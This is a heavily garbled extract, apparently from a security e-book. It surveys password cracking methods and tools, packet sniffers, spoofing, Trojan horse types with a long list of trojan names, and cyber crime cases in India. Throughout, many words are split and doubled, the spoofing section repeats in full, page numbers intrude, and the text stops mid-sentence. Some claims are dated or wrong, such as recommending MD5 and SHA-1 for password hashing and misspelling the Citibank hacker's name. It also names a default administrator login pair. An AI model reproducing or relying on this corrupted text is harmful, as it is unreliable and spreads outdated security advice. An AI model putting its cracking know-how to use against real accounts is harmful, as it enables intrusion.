Guessing Not Not surp surpri risi singl ngly y, many many user userss choos choosee weak weak pass passwo word rds, s, usua usuall lly y one rela relate ted d to themselves in some way. Repeated research over some 40 years has demonstrated that around 40% of user-chosen passwords are readily guessable by programs. Examples of insecure choices include: •
blank (none)
•
the word word "pas "passwo sword" rd",, "passc "passcode" ode",, "admin" "admin" and and their their deriva derivates tes
•
the the use user' r'ss nam namee or or log login in name name
•
the name name of their their signi signific ficant ant other other or or anoth another er rela relativ tivee
•
thei theirr birt birthp hpla lace ce or or date date of of birt birth h 36
•
a pet's name
•
auto automo mobi bile le lic licen ence ce pla plate te num numbe ber r
•
a simp simple le modif modific icat atio ion n of one of the the prec preced edin ing, g, such such as suffi suffixi xing ng a digi digitt or reversing the order of the letters.
•
a row of letter letterss from from a stan standa dard rd keybo keyboar ard d layout layout (eg, (eg, the the qwerty qwerty keybo keyboar ard d -qwerty itself, asdf, or qwertyuiop) and so on.
Some users even neglect to change the default password that came with their account on the the compu compute terr syst system em.. And And some some admin adminis istr trat ator orss negl neglect ect to chan change ge defa defaul ultt accou account nt passwords provided by the operating system vendor or hardware supplier. A famous example is the use of FieldService as a user name with Guest as the password. If not changed at system configu configurat ration ion time, time, anyone anyone famili familiar ar with with such such system systemss will will have 'crack 'cracked' ed' an import important ant password; such service accounts often have higher access privileges than a normal user account. The determined cracker can easily develop a computer program that accepts personal information about the user being attacked and generates common variations for passwords suggested by that information.
Dictionary attack A dictionary attack also exploits the tendency of people to choose weak passwords, and is related to the previous attack. a ttack. Password cracking programs usually come equipped with "dictionaries", or word lists, with thousands or even millions of entries of several kinds, including: •
word wordss in vari variou ouss lang langua uage gess
•
names of people
•
places
•
comm common only ly used used pas password wordss
The cracking program encrypts each word in the dictionary, and simple modifications of each word, and checks whether any match an encrypted password. This is feasible because the attack attack can be automa automated ted and, and, on inexpe inexpensi nsive ve modern modern compute computers rs,, severa severall thousa thousand nd possibilities can be tried per second. Guessing, combined with dictionary attacks, have been repeatedly and consistently demonstrated for several decades to be sufficient to crack perhaps as many as 50% of all account passwords on production systems. 37
Brute force attack A last resort is to try every possible password, known as a brute force attack. In theory, a brute force attack will always be successful since the rules for acceptable passwords must be publicly known, but as the length of the password increases, so does the number of possible passwords. This method is unlikely to be practical unless the password is relatively small. But, how small is too small? A common current length recommendation is 8 or more random randomly ly chosen chosen charact characters ers combin combining ing letter letters, s, number numbers, s, and specia speciall (punct (punctuat uation ion,, etc) etc) characters. Systems which limit passwords to numeric characters only, or upper case only, or, generally, generally, which exclude e xclude possible password character choices ch oices make such attacks easier. Using longer passwords in such cases (if possible on a particular system) can compensate for a limited allowable character set. And, of course, even with an adequate range of character choice, users who ignore that range (using only upper case alphabetic characters, or digits alone, for instance) make brute force attacks much easier against those password choices. Generic Generic brute-force brute-force search techniques techniques can be used to speed up the computation. computation. But the real threat may be likely to be from smart brute-force techniques that exploit knowledge about how people tend to choose passwords. NIST SP 800-63 (2) provides further discussion of password password quality, quality, and suggests, suggests, for example, example, that an 8 character character user-chosen user-chosen password password may provide somewhere between 18 and 30 bits of entropy, depending on how it is chosen. Note: This number is very far less than what is generally considered to be safe for an encryption key. How small is too small thus depends partly on an attacker's ingenuity and resources (e.g., available time, computing power, etc.), the latter of which will increase as computers get faster. Most commonly used hashes can be implemented using specialized hardware, allowing faster attacks. Large numbers of computers can be harnessed in parallel, each trying a separa separate te portio portion n of the search search space. space. Unused overnight overnight and weekend weekend time on offic officee computers can also be used for this purpose. The distinction between guessing, dictionary and brute force attacks is not strict. They are similar in that an attacker goes through a list of candidate passwords one by one; the list may be explicitly enumerated or implicitly defined, may or may not incorporate knowledge about the victim, and may or may not be linguistically derived. Each of the three approaches, particularly 'dictionary attack', is frequently used as an umbrella term to denote all the three attacks and the spectrum of attacks encompassed by them.
38
Precomputation In its most basic form, precomputation involves hashing each word in the dictionary (or any search space of candidate passwords) and storing the
pairs in a way that enables lookup on the ciphertext field. This way, when a new encrypted password is obtain obtained, ed, passw password ord recove recovery ry is instan instantane taneous ous.. Precomp Precomputa utatio tion n can be very very useful useful for a dictionary attack if salt is not used properly (see below), and the dramatic decrease in the cost of mass storage has made it practical for fairly large dictionaries. Advanced precomputation methods exist that are even more effective. By applying a timememory tradeoff, a middle ground can be reached - a search space of size N can be turned into an encrypted database of size O(N2/3) in which searching for an encrypted password takes time O(N2/3). The theory has recently been refined into a practical technique, and the online implementation at http://passcracking.com/ achieves impressive results on 8 character alphanu alphanumer meric ic MD5 hashes hashes.. Another Another example example [1] cracks cracks alphanu alphanumer meric ic Windows indows LAN Manager passwords in a few seconds. This is much faster than brute force attacks on the obsolete LAN Manager, which uses a particularly weak method of hashing the password. Current Windows systems still compute and store a LAN Manager hash by default for backwards compatibility compa tibility.. [2]) A technique similar to precomputation, known generically as memoization, can be used to crack multiple passwords at the cost of cracking just one. Since encrypting a word takes much longer than comparing it with a stored word, a lot of effort is saved by encrypting each word only once and comparing it with each of the encrypted passwords using an efficient list search algorithm. The two approaches may of course be combined: the timespace tradeoff attack can be modified to crack multiple passwords simultaneously in a shorter time than cracking them one after the other.
Salting The benefits of precomputation and memoization can be nullified by randomizing the hashing process. This is known as salting. When the user sets a password, a short, random string called the salt is suffixed to the password before encrypting it; the salt is stored along with the encrypted password so that it can be used during verification. Since the salt is usually different for each user, the attacker can no longer construct tables with a single encrypted version of each candidate password. Early Unix systems used a 12-bit salt. Attackers could still build tables with common passwords encrypted with all 4096 possible 12-bit salts. 39
However, if the salt is long enough (e.g. 32 bits), there are too many possibilities and the attacker must repeat the encryption of every guess for e ach user.
Early Unix password vulnerability Early Unix implementations used a 12-bit salt, which allowed for 4096 possibilities, and limited passwords to 8 characters. While 12 bits was good enough for most purposes in the 1970s (although some expressed doubts even then), by 2005 disk storage has become cheap enough that an attacker can precompute encryptions of millions of common passwords, including all 4096 possible salt variations for each password, and store the precomputed values on a single portable hard drive. An attacker with a larger budget can build a disk farm with all 6 character passwords and the most common 7 and 8 character passwords stored in encrypted encrypted form, for all 4096 possible possible salts. And when several thousand passwords passwords are being cracked at once, memoization still offers some benefit. Since there is little downside to using a longer (say 32-, 64- or 128-bit) salt, and they render any precomputation or memoization hopeless, modern implementations choose to do so.
Prevention The best method of preventing password cracking is to ensure that attackers cannot get access even to the encrypted password. For example, on the Unix operating system, encrypted passwords were originally stored in a publicly accessible file "/etc/passwd". On mode modern rn Unix Unix (and (and simi simila lar) r) syst system ems, s, on the the othe otherr hand hand,, they they are are stor stored ed in the the file file "/etc/shadow", which is accessible only to programs running with enhanced privileges (ie, 'syst 'system' em' privil privilege eges). s). This makes makes it harder harder for a malici malicious ous user user to obtain obtain the encryp encrypted ted passwords in the first instance. Unfortunately, many common network protocols transmit the hashed passwords to allow remote authentication. Even if the attacker has no access to the password database itself, every attacker should also be prevented from being able to use the system itself to check a large number of passwords in a relatively small amount of time. For this reason, many systems include a significant forced delay (a few seconds is generally sufficient) between the entry of the password and returning a result. Also, it is a good policy to (temporarily) lock out an account that has been subjected to 'too many' incorrect password guesses, although this could be exploited to launch a denial of service attack. Too many in this context is frequently taken to be something like more than 3 failed attempts in 90 seconds, or more than a dozen failed attempts in an hour ho ur.. 40
It is also imperative to choose good passwords (see password for more information) and a good encryption or hash algorithm that has stood the test of time. AES, SHA-1, and MD5 are common choices. Good implementations, including adequate salt, are also required. Key derivation functions, such as PBKDF2, are hashes that consume relatively large amounts of computer time so as to slow down the rate at which an attacker can test guesses, even if the hashed password is available. This process is known as ke y strengthening. However, no amount of effort put into preventing password cracking can be sufficient without a well-designed and well-implemented security policy. The canonical and all too common example of this is the user who leaves their password on a Post-It note stuck to their monitor or under their keyboard. Even sophisticated users who have been warned repeatedly are known to have such lapses. Password cracking programs • Ophcrack - Open source Ophcrack is an Open Source (GPL License) program that cracks Windows LM hashes using rainbow tables. It can crack 99.9% of alphanumeric passwords of up to 14 characters in usually a few seconds, and at most a few minutes. There is also a LiveCD version which auto automa mate tess the the retr retrie ieva val, l, decr decry yptio ption, n, and and crac cracki king ng of pass passwo word rdss from from a Windo indows ws system.Starting with version 2.3, Ophcrack also cracks NT hashes. • Crack Crack is a Unix password cracking program designed to allow system administrators to locate users who may have weak passwords vulnerable to a dictionary attack. Crack began in 1990 when Alec Muffett, a Unix system administrator at the University of Wales Aberystwyth was trying to improve Dan Farmer's 'pwc' cracker in COPS and found that by re-engineering its memory management he got a noticeable performance increase. This led to a total rewrite which became "Crack v2.0" and further development to improve usability. • Cain Cain and Abel is a Windows password recovery tool. It can recover many kinds of passwords using methods such as network packet sniffing, cracking various password hashes by using methods methods such as dictionary dictionary attacks, brute force and cryptanalys cryptanalysis is attacks. attacks. Cryptanaly Cryptanalysis sis attacks are done via rainbow tables which can be generated with the winrtgen.exe program provided with Cain. Cain and Abel is maintained by Massimiliano Montoro. • John the Ripper
41
John the Ripper is a free password password cracking cracking software software tool. Initially Initially developed for the UNIX operati operating ng system system,, it curren currently tly runs on fiftee fifteen n differ different ent platfo platforms rms (11 flavor flavorss of Unix Unix counting each flavor only once for all the architectures it supports -, DOS, Win32, BeOS, and OpenVMS). It is one of the most popular password testing/breaking programs as it combines a number of password crackers into one package, autodetects, and includes a customisable cracker. It can be run against various encrypted password formats including several crypt password hash types most commonly found on various Unix flavors (based on DES, MD5, or Blowfish), Kerberos AFS, and Windows NT/2000/XP/2003 LM hash. Additional modules have extended its ability to include MD4-based password hashes and passwords stored in LDAP, MySQL and others. John the Ripper is a perfectly safe program to install and run on your computer. If you are running a multi-user system, you should make sure you are shadowing your password file such that the hashes are not visible; however even if you are not, not installing John will not prevent a malicious user from running John on their own computer with your hashes[citation needed]. • LC5 (formerly L0phtCrack) L0phtCrack is a password auditing and recovery application (now called LC5), originally produced by Mudge from L0pht Heavy Industries. It is used to test password strength and sometimes to recover lost Microsoft Windows passwords, by using dictionary, brute-force, and hybrid attacks. It was one of the crackers' tools of choice, although most use old versions because of its price p rice and low availability. availability. The application was produced by b y @stake after the L0pht merged with @stake in 2000. @stake was acquired by Symantec in 2004. Symantec has since stopped selling this tool to new customers citing US Government export regulations, and has announced that they will discontinue support by the end of 2006. LC5 can still be found at SecTools.Org and other unofficial mirrors. • RainbowCrack Rainbo RainbowCr wCrack ack is the name of a comput computer er program program which perfor performs ms passwo password rd cracki cracking. ng. RainbowCrack differs from "conventional" brute force crackers in that it uses large precomputed files called rainbow tables to reduce the length of time needed to crack a password drastically. RainbowCrack was developed by Zhu Shuanglei, and implements an improved time-memory trade-off cryptanalysis cryptanalysis attack which originated in Philippe Oechslin's Ophcrack.
Back 42
43
44
Sniffers: Basics and Detection “If you know the enemy and know k now yourself, you need not fear the result of a hundred battles. If you know yourself but not the enemy ene my,, for every victory gained you will also suffer a defeat. If you know neither the enemy enem y nor yourself, you will succumb in every battle.”
Introduction A sniffer is a program or a device that eavesdrops on the network traffic by grabbing information traveling over a network. Sniffers basically are "Data Interception" technology. They work because the Ethernet was built around a principle of sharing. Most networks use broadcast technology wherein messages for one computer can be read by another computer on that network. In practice, all the other computers except the one for which the message is meant, will ignore that message. However, computers can be made to accept messages even if they are not meant for them. This is done by means of a Sniffer! Many people assume computers connected to a switch are safe from sniffing. Nothing could be further from the truth. Computers connected to switches are just as vulnerable to sniffing as those connected con nected to a hub. This article seeks to explore the topic of sniffers, how they work, detecting and protecting your assets against the malicious use of these programs. Finally, towards the end we will talk about some commonly available sniffers.
How A Sniffer Works A computer connected to the LAN has two addresses. One is the MAC (Media Access Control) address that uniquely identifies each node in a network and is stored on the network card itself. It is the MAC address that gets used by the Ethernet protocol while building “frames” to transfer data to and from a machine. The other is the IP address, which is used by applications. The Data Link Layer uses an Ethernet header with the MAC address of the destin destinati ation on machin machinee rather rather than than the IP Address Address.. The Networ Network k Layer Layer is respon responsib sible le for mapping IP network addresses to the MAC address as required by the Data Link Protocol. It initially looks up the MAC address of the destination machine in a table, usually called the ARP (Address Resolution Protocol) cache. If no entry is found for the IP address, the Address Resolu Resolutio tion n Protoco Protocoll broadca broadcasts sts a reques requestt packet packet (ARP (ARP reques request) t) to all machin machines es on the network. The machine with that address responds to the source machine with its MAC 45
address. This MAC address then gets added to the source machine’s ARP Cache. The source machine in all its communications with the destination machine then uses this MAC address. There are two basic types of Ethernet environments and how sniffers work in both these cases is slightly different.Shared Ethernet: In a shared Ethernet environment, all hosts are connected to the same bus and compete with one another for bandwidth. In such an environment packets meant for one machine are received by all the other machines. Thus when a machine Venus Venus
46
Well-known packet sniffers •
AiroPeek
•
dSniff
•
Ethereal
•
EtherPeek
•
Ettercap
•
Kismet
•
Javvin Packet Aalyzer
•
NetStumbler
•
Network General Sniffer
•
Network Instruments Observer
•
OmniPeek
•
PRTG
•
snoop (Solaris)
•
tcpdump
•
Wireshark ark (f (formerly known as Ether hereal[1])
•
WPE (Winsock pa packet editor)
Spoofing attack In the context of network security, a spoofing attack is a situation in which one person or program successfully masquerades as another by falsifying data and thereby gains an illegitimate advantage.
Man-in-the-middle attack and internet protocol spoofing An example from cryptography is the man-in-the-middle attack, in which an attacker spoofs spoofs Alice into believing he's Bob, and spoofs Bob into believing believing he's Alice, Alice, thus gaining gaining access to all messages in both directions without the trouble of any cryptanalytic effort.
47
The attacker must monitor the packets sent from Alice to Bob and then guess the sequence number of the packets. Then the attacker knocks out Alice with a SYN attack and injects his own packets, claiming to have the address of Alice. Alice's firewall can defend against some spoof attacks when it has been configured with knowledge of all the IP addresses connected to each of its interfaces. It can then detect a spoofed packet if it arrives at an interface that is not known to be connected to the IP address. Many carelessly designed protocols are subject to spoof attacks, including many of those used on the Internet. See Internet protocol spoofing.
URL spoofing and phishing Another kind of spoofing is "webpage spoofing," also known as phishing. In this attack, a legitimate web page such as a bank's site is reproduced in "look and feel" on another server under control of the attacker. The intent is to fool the users into thinking that they are connected to a trusted site, for instance to harvest user names and passwords.This attack is often performed with the aid of URL spoofing, which exploits web browser bugs in order to display incorrect URLs in the browsers location bar; or with DNS cache poisoning in order to direct the user away from the legitimate site and to the fake one. Once the user puts in their passw password ord,, the attack attack-co -code de report reportss a passwo password rd error error,, then then redire redirects cts the user user back to the legitimate site.
Referer spoofing Some websites, especially pornographic paysites, allow access to their materials only from certain approved (login-) pages. This is enforced by checking the Referer header of the HTTP request. This referer header however can be changed (known as "Referer spoofing" or "Ref-tar spoofing"), allowing users to gain unauthorized access to the materials. Poisoning of file-sharing networks "Spoofing" can also refer to copyright holders placing distorted or unlistenable versions of works on file-sharing networks, to discourage downloading from these sources.
Caller ID spoofing In public telephone networks, it has for a long while been possible to find out who is calling you by looking at the Caller ID information that is transmitted with the call. There are technologies that transmit this information on landlines, on cellphones and also with VoIP. 48
Unfortunately, there are now technologies (especially associated with VoIP) that allow callers to lie about their identity, and present false names and numbers, which could of course be used as a tool to defraud or harass. Because there are services and gateways that interconnect VoIP with other public phone networks, these false Caller IDs can be transmitted to any phone on the planet, which makes the whole Caller ID information now next to useless. Due to the distributed geographic nature of the Internet, VoIP calls can be generated in a different country to the receiver, which means that it is very difficult to have a legal framework to control those who would use fake Caller IDs as part of a scam.
Man-in-the-middle attack and internet protocol spoofing An example from cryptography is the man-in-the-middle attack, in which an attacker spoofs spoofs Alice into believing he's Bob, and spoofs Bob into believing believing he's Alice, Alice, thus gaining gaining access to all messages in both directions without the trouble of any cryptanalytic effort. The attacker must monitor the packets sent from Alice to Bob and then guess the sequence number of the packets. Then the attacker knocks out Alice with a SYN attack and injects his own packets, claiming to have the address of Alice. Alice's firewall can defend against some spoof attacks when it has been configured with knowledge of all the IP addresses connected to each of its interfaces. It can then detect a spoofed packet if it arrives at an interface that is not known to be connected to the IP address. Many carelessly designed protocols are subject to spoof attacks, including many of those used on the Internet. See Internet protocol spoofing.
URL spoofing and phishing Another kind of spoofing is "webpage spoofing," also known as phishing. In this attack, a legitimate web page such as a bank's site is reproduced in "look and feel" on another server under control of the attacker. The intent is to fool the users into thinking that they are connected to a trusted site, for instance to harvest user names and passwords. This attack is often performed with the aid of URL spoofing, which exploits web browser bugs in order to display incorrect URLs in the browsers location bar; or with DNS cache poisoning poisoning in order to direct the user away from the legitimate legitimate site and to the fake one. Once the user puts in their password, the attack-code reports a password error, then redirects the user back to the legitimate site.
49
Referer spoofing Some websites, especially pornographic paysites, allow access to their materials only from certain approved (login-) pages. This is enforced by checking the Referer header of the HTTP request. This referer header however can be changed (known as "Referer spoofing" or "Ref-tar spoofing"), allowing users to gain unauthorized access to the materials.
Poisoning of file-sharing networks "Spoofi "Spoofing" ng" can also also refer refer to copyrig copyright ht holder holderss placin placing g distor distorted ted or unlist unlistena enable ble versions of works on file-sharing networks, to discourage downloading from these sources.
Caller ID spoofing In public telephone networks, it has for a long while been possible to find out who is calling you by looking at the Caller ID information that is transmitted with the call. There are technologies that transmit this information on landlines, on cellphones and also with VoIP. Unfortunately, there are now technologies (especially associated with VoIP) that allow callers to lie about their identity, and present false names and numbers, which could of course be used as a tool to defraud or harass. Because there are services and gateways that interconnect VoIP with other public phone networks, these false Caller IDs can be transmitted to any phone on the planet, which makes the whole Caller ID information now next to useless. Due to the distributed geographic nature of the Internet, VoIP calls can be generated in a different country to the receiver, which means that it is very difficult to have a legal framework to control those who would use fake Caller IDs as part of a scam.
Trojan horse Example of a simple Trojan horse A simple example of a trojan horse would be a program named "waterfalls.scr" claiming to be a free waterfall screensaver which, when run, instead begins erasing all the files on the victim’s computer. Types of Trojan horses Troja Trojan n horses horses are almost almost always always design designed ed to do variou variouss harmfu harmfull things things,, but could be harmless. They are broken down in classification based on how they breach systems and the damage they cause. The seven main types of Trojan horses are: •
Remote Access Trojans
•
Data Sending Trojans 50
•
Destructive Trojans
•
Proxy Trojans
•
FTP Trojans
•
security software disabler Trojans
•
den denialal-of-service attack (DoS) Trojans
•
URL Trojans
Some examples are: •
era erasing or ove overwriting data ata on a com computer.
•
encr encry yptin pting g fi files les in in a cry cryptovir oviral al ext extort ortion ion at attack tack..
•
corrupting files in a subtle way.
•
upload and download files.
•
allowing allowing remote remote access access to the victim' victim'ss computer computer.. This This is called called a RAT RAT. (remote (remote administration tool)
•
spreading spreading other other malware malware,, such as viruses viruses.. In this this case case the the Troja Trojan n horse is called called a 'dropper' or 'vector'.
•
settin setting g up networ networks ks of zombi zombiee compute computers rs in order order to to launch launch DDoS DDoS attack attackss or send spam.
•
spyi spying ng on the the user user of a comp comput uter er and cover covertl tly y report reportin ing g data like like brow browsi sing ng habits to other people (see the article on spyware).
• •
make screenshots. loggi logging ng keystr keystroke okess to steal steal infor informa mati tion on such as pass passwo word rdss and credi creditt card card numbers (also known as a keylogger).
•
phis phish h for for bank bank or othe otherr acco accoun untt deta detail ils, s, which which can be used used for crim crimin inal al activities.
•
installing a backd ckdoor on a comp omputer sys system. em.
•
opening and closing CD-ROM tray.
•
har harvest est ee-mail ad addresses an and us use th them for sp spam. am.
•
Rest Restar arts ts the the com compu pute terr when whenev ever er the the inf infec ecte ted d pro progr gram am is star starte ted. d.
Time bombs and logic bombs "Time bombs" and "logic bombs" are types of trojan horses. "Time bombs" activate on particular dates and/or times. "Logic bombs" activate on certain conditions met by the computer. computer.
51
Droppers Droppers perform two tasks at once. A dropper performs a legitimate task but also installs a computer virus or a computer worm on a system or disk at the same time.
Precautions against Trojan horses Trojan horses can be protected against through end-user awareness. Trojan Horse viruses can cause a great deal of damage to a personal computer but even more damage to a business, particularly a small business that usually does not have the same virus protection capabilities as a large business. Since a Trojan Horse virus is hidden, it is harder to protect yourself or your company from it, but there are things that you can do. Trojan Horses are most commonly spread through an e-mail, much like other types of common viruses. The only difference being of course is that a Trojan Horse is hidden. The best ways to protect yourself and your company from Trojan Horses are as follows: 1. If you receive e-mail from someone that you do not know or you receive an unknown
attachment, never open it right away. As an e-mail user you should confirm the source. Some hackers have the ability to steal address books, so if you see e-mail from someone you know, it is not necessarily safe. When sett settin ing g up your your e-ma e-mail il clie client nt,, make make sure sure that that you you have have the the sett settin ings gs so that that 2. When attachments do not open automatically. Some e-mail clients come ready with an anti-virus program that scans any attachments before they are opened. If your client does not come with this, it would be best to purchase one or download one for free. 3. Make sure your computer has an anti-virus program on it and update it regularly. If you
have an auto-update option included in your anti-virus program you should turn it on; that way if you forget to update your software you can still be protected from threats 4. Operating systems offer patches to protect their users from certain threats and viruses,
including Trojan Horses. Software developers like Microsoft offer patches that in a sense "close the hole" that the Trojan horse or other virus would use to get through to your system. If you keep your system updated with these patches, your computer is kept much safer. 5. Avoid using peer-to-peer or P2P sharing networks like Kazaa, Limewire, Ares, or Gnutella
because they are generally unprotected from viruses and Trojan Horse viruses spread through them especially easily. Some of these programs do offer some virus protection, but this is
52
often not strong enough. If you insist on using P2P, it would be safe to not download files that claim to be "rare" songs, books, movies, mov ies, pictures, etc. Besides Besides these sensible sensible precautions, precautions, one can also install anti-trojan anti-trojan software, some of which is offered free.
Methods of Infection The majority of trojan horse infections occur because the user was tricked into running an infected program. This is why it is advised to not open unexpected attachments on emails -- the program is often a cute animation or a sexy picture, but behind the scenes it infects the computer with a trojan or worm. The infected program doesn't have to arrive via email, though; it can be sent to you in an Instant Message, downloaded from a Web site or by FTP, or even delivered on a CD or floppy disk. (Physical delivery is uncommon, but if you were the specific target of an attack, it would be a fairly reliable way to infect your computer.) Furthermore, an infected program could come from someone who sits down at your computer and loads it manually. Websites: You You can be infected by visiting a rogue website. Email: If you use Microsoft Outlook, you're vulnerable to many of the same problems that Internet Explorer has, even if you don't use IE directly. directly. Open Open ports: ports: Compute Computers rs runnin running g their their own server serverss (HTTP (HTTP,, FTP, FTP, or SMTP SMTP, for example example), ), allowi allowing ng Windows indows file file sharin sharing, g, or runnin running g progra programs ms that that provid providee filesh fileshari aring ng capabil capabiliti ities es such such as Instan Instantt Messen Messenger gerss (AOL's (AOL's AIM, MSN Messen Messenger ger,, etc.) etc.) may have vulnerabilities similar to those described above. These programs and services may open a network port giving attackers a means for interacting with these programs from anywhere on the Internet. Vulnerabi Vulnerabilitie litiess allowing allowing unauthorized unauthorized remote entry are regularly regularly found in such programs, so they should be avoided or properly secured. A firewall may be used to limit access to open ports. Firewalls are widely used in practice, and they help to mitigate the problem of remote trojan insertion via open ports, but they are not a totally impenetrable solution, either. Some of the modern trojans that come through the messengers,they come in as a very important looking message, but contain trojans, the exe files are same or look same as that of windows system proccesses like 'Svchost.exe', some of the look alike trojans are: •
Svchost32.exe
•
Svhost.exe
•
back.exe 53
Well-known trojan horses •
Back Orifice
•
Back Orifice 2000
•
NetBus
•
SubSeven
•
Downloader-EV
•
Pest Trap
•
AIDS
•
Back Orifice
•
Back Orifice 2000
•
Beast Trojan
•
Bifrose
•
Insurrection
•
NetBus
•
Optix Pro
•
Posion Ivy
•
ProRat
•
S ub 7
•
EGABTR
•
RemoteHAK
•
A-311 Death
•
A4zeta
•
Abacab
•
Acessor
•
AcidBattery
•
Acid Drop
•
AcidHead
•
Acid Kor
•
Acidsena
•
AcidShivers
•
Acid Trojan Horse
•
AckCmd
•
Acojonaor
ksv
Carl-Fredrik Neikter
54
•
Acropolis
•
Admin.Troj.Kikzyurarse
•
Advertiser Bot
•
AeonwindDoll
•
Afcore
•
A-FTP
•
AF
•
Agent 40421
•
AH
•
Aibolit
•
AIMaster
•
AIM Filter
•
AimFrame
•
aim P
•
Aim Password Stealer
•
AIM Pws
•
AimRat
•
AIM Robber
•
AIM Spy
•
AIMVision
•
AIR
•
AirBot
•
Akosch
•
Aladino
•
Al-Bareki
•
Alcatraz
•
Alerter
•
AlexMessoMalex
•
Alicia
•
Alien Hacker
•
Alien Spy
•
Almaster
•
Almetyevsk
•
Almq 55
•
Alex
•
Alofin
•
Alop
•
Alph
•
AlphaDog
•
Alvgus
•
Amanda
•
Amiboide Uploader
•
Ambush
•
AmigaAnywhere
•
Amitis
•
Amoeba
•
AMRC
•
AMS
•
Anal FTP
•
Anal Ra
•
AnarchoIntruder
•
Andromeda
•
A New Trojan
•
Angelfire
•
AngelShell
•
Annoy Toys
•
Anthena
•
Anti Danger
•
Anti-Denial
•
AntiMks
•
AntiPC
•
AntiLamer Backdoor
•
Anti MSN
•
Antylamus
•
AolAdmin
•
Apdoor
•
Aphex's FTP
•
Aphex's Remote Packet Sniffer 56
•
Aphex tunneld 2.0
•
AppServ
•
APRE
•
Aqua
•
Arcanum
•
Area Control
•
Ares Invader
•
Armageddon
•
arplhmd
•
Arranca
•
Arsd
•
Artic
•
Arturik
•
AsbMay
•
A.S.H.
•
Ashley
•
Ass4ss1n
•
Assasin
•
Asylum
•
Admin.Troj.Kikzyurarse
•
Atentator
•
A-Trojan
•
Attack FTP
•
Atwinda
•
AudioDoor
•
Autocrat
•
AutoPWN
•
Autograph
•
AutoSpY
•
Avanzado
•
Avone
•
Ayan Bilisim
•
Azrael
•
BD Blade runner 0.80a 57
•
Crazy Daisy
•
Connect4
•
Donald Dick
•
Flatley Trojan
•
Theef
•
Twelve Tricks
Rituall33
Back
58
59
Introduction to Cyber Crime The first recorded cyber crime took place in the year 1820! 1820! That That is not surpri surprisi sing ng conside considerin ring g the fact fact that that the abacus, which is thought to be the earliest form of a computer, has been around since 3500 B.C. in India, Japan and China. Thee era Th era of mode modern rn compu compute ters rs,, howe however ver,, began began with with the the analytical engine of Charles Babbage. In 1820, Joseph-Marie Jacquard, a textile manufacturer in Fran France ce,, produ produce ced d the the loom loom.. Th This is devic devicee allo allowe wed d the the repetition of a series of steps in the weaving of special fabrics. This resulted in a fear amongst Jacquard's employees that their traditional employment and livelihood were being threatened. They committed acts of sabotage to discourage Jacquard from from furt furthe herr use use of the the new new tech techno nolo logy gy.. Th This is is the the firs firstt reco record rded ed cybe cyberr crim crime! e!
Today computers have come a long way, with neural networks and nano-computing promising to turn every atom in a glass of water into a computer capable of performing a Billion operations per second. Cyber crime is an evil having its origin in the growing dependence on computers in modern life. In a day and age when everything from microwave ovens and refrigerators to nuclear power plants is being run on computers, cyber crime has assumed rather sinister implications. Major cyber crimes in the recent past include the Citibank rip off. US $ 10 million were fraudulently transferred out of the bank and into a bank account in Switzerland. A Russian hacker group led by Vladimir Kevin, a renowned hacker, perpetrated the attack. The group compromised the bank's security systems. Vladimir was allegedly using his office computer at AO Saturn, a computer firm in St. Petersburg, Russia, to break into Citibank computers. He was finally arrested on Heathrow airport on his wa y to Switzerland
60
Defining Cyber Crime At the onset, onset, let us satisf satisfact actori orily ly define define "cyber "cyber crime" crime" and differ different entiat iatee it from from "conventional Crime". 166 Computer crime can involve criminal activities that are traditional in nature, such as theft, fraud, forgery, defamation and mischief, all of which are subject to the Indian Penal Code. The abuse of computers has also given birth to a gamut of new age crimes that are addressed by the Information Technology Act, 2000. Defining cyber crimes, as "acts that are punishable by the Information Technology Act" would be unsuitable as the Indian Penal Code also covers many cyber crimes, such as email spoofing and cyber defamation, sending threatening emails etc. A simple yet sturdy definition of cyber crime would be "unlawful acts wherein the computer is either a tool or a target or both". Let us examine the acts wherein the computer is a tool for an unlawful act. This kind of activity usually involves a modification of a conventional crime b y using computers. Some examples are:
Financial crimes This would include cheating, credit card frauds, money laundering etc. To cite a recent case, a website offered to sell Alphonso mangoes at a throwaway price. Distrusting such a transaction, very few people responded to or supplied the website with their credit card number numbers. s. These These people people were were actual actually ly sent sent the Alphons Alphonso o mangoes mangoes.. The word word about about this this website now spread like wildfire. Thousands of people from all over the country responded and ordered mangoes by providing their credit card numbers. The owners of what was later proven to be a bogus website then fled taking the numerous credit card numbers and proceeded to spend huge amounts of money much to the chagrin of the card owners.
Cyber pornography
61
This would include pornographic websites; pornographic magazines produced using computers (to publish and print the material) and the Internet (to download and transmit pornographic pictures, photos, writings etc). Recent Indian incidents revolving around cyber pornography include the Air Force Balbharati School case. A student of the Air Force Balbharati School, Delhi, was teased by all his classmates for having a pockmarked face. Tired of the cruel jokes, he decided to get back at his tormentors. He scanned photographs of his classmates and teachers, morphed them with nude photographs and put them up on a website that he uploaded on to a free web hosting service. It was only after the father of one of the class girls featured on the website objected and lodged a complaint with the police that any action was taken. In another incident, in Mumbai a Swiss couple would gather slum children and then would force them to appear for obscene photographs. They would then upload these photographs to websites specially designed for paedophiles. The Mumbai police arrested the couple for pornography.
Sale of illegal articles This This would would inclu include de sale sale of narc narcoti otics, cs, weapon weaponss and and wildli wildlife fe etc., etc., by posti posting ng information on websites, auction websites, and bulletin boards or 167 simply by using email communication. E.g. many of the auction sites even in India are believed to be selling cocaine in the name of 'honey'.
Online gambling gambling There There are millions millions of websit websites; es; all hosted hosted on server serverss abroad, that offer online gambling. In fact, it is believed that many of these websites are actually fronts for money laundering.
62
63
Intellectual Intellectual Property crimes crimes These include software piracy, copyright infringement, trademarks violations, theft of computer source code etc .
Email spoofing A spoofed email is one that appears to originate from one source but actually has been sent from another source. E.g. Pooja has an e-mail address [email protected]. Her enemy, Sameer spoofs spoofs her e-mail and sends obscene messages messages to all her acquaintances acquaintances.. Since the emails appear to have originated originated from Pooja, her friends friends could take offence and relationships relationships could be spoiled for life. Email spoofing can also cause monetary damage. In an American case, case, a teenage teenagerr made millio millions ns of dollar dollarss by spreadi spreading ng false false inform informati ation on about about certai certain n companies whose shares he had short sold. This misinformation was spread by sending spoofed emails, purportedly from news agencies like Reuters, to share brokers and investors who were informed that the companies were doing very badly. Even after the truth came out the values of the shares did not go back to the earlier levels and thousands of investors lost a lot of money.
Forgery Counterfeit currency notes, postage and revenue stamps, mark sheets etc can be forged using sophisticated computers, printers and scanners. Outside many colleges across India, one finds touts soliciting the sale of fake mark sheets or even certificates. These are made using computers, and high quality scanners and printers. In fact, this has becoming a booming business involving thousands of Rupees being given to student gangs in exchange for these bogus but authentic looking certificates.
Cyber Defamation
64
This occurs when defamation takes place with the help of computers and / or the Internet. E.g. someone publishes defamatory matter about someone on a website or sends emails
containing
defamatory
